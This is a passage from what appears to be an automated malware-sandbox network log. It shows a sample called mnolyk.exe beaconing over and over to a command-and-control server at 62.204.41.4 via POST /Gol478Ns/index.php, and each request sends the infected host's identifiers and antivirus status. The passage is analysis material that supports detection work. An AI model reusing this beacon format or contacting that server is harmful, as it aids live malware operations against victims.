                                                                    Feb 8, 2023 21:31:26.169698000 CET239INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:26 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    380192.168.2.35008362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:09.880270004 CET580OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:09.943525076 CET580INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:09 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    381192.168.2.35008462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:10.121092081 CET581OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:10.185554981 CET581INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:10 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    382192.168.2.35008562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:10.354712963 CET582OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:10.417748928 CET582INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:10 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    383192.168.2.35008662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:10.598459005 CET583OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:10.661725044 CET583INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:10 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    384192.168.2.35008762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:10.839510918 CET584OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:10.902750969 CET584INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:10 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    385192.168.2.35008862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:11.076338053 CET585OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:11.141714096 CET585INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:11 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    386192.168.2.35008962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:11.324057102 CET586OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:11.387929916 CET586INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:11 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    387192.168.2.35009062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:11.561825037 CET587OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:11.625634909 CET587INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:11 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    388192.168.2.35009162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:11.991736889 CET588OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:12.058008909 CET588INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:12 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    389192.168.2.35009262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:12.281172991 CET589OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:12.343425035 CET589INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:12 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    39192.168.2.34974162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:26.473669052 CET240OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:26.537626028 CET240INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:26 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    390192.168.2.35009362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:12.595076084 CET590OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:12.658941031 CET590INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:12 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    391192.168.2.35009462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:13.788321018 CET591OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:13.853844881 CET591INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:13 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    392192.168.2.35009562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:15.244489908 CET592OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:15.309886932 CET592INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:15 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    393192.168.2.35009662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:15.486305952 CET593OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:15.550494909 CET593INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:15 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    394192.168.2.35009762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:15.743647099 CET594OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:15.807949066 CET594INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:15 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    395192.168.2.35009862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:15.979666948 CET595OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:16.043409109 CET595INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:16 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    396192.168.2.35009962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:16.214939117 CET596OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:16.318130970 CET596INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:16 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    397192.168.2.35010062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:16.504024982 CET597OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:16.567168951 CET597INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:16 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    398192.168.2.35010162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:16.750361919 CET598OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
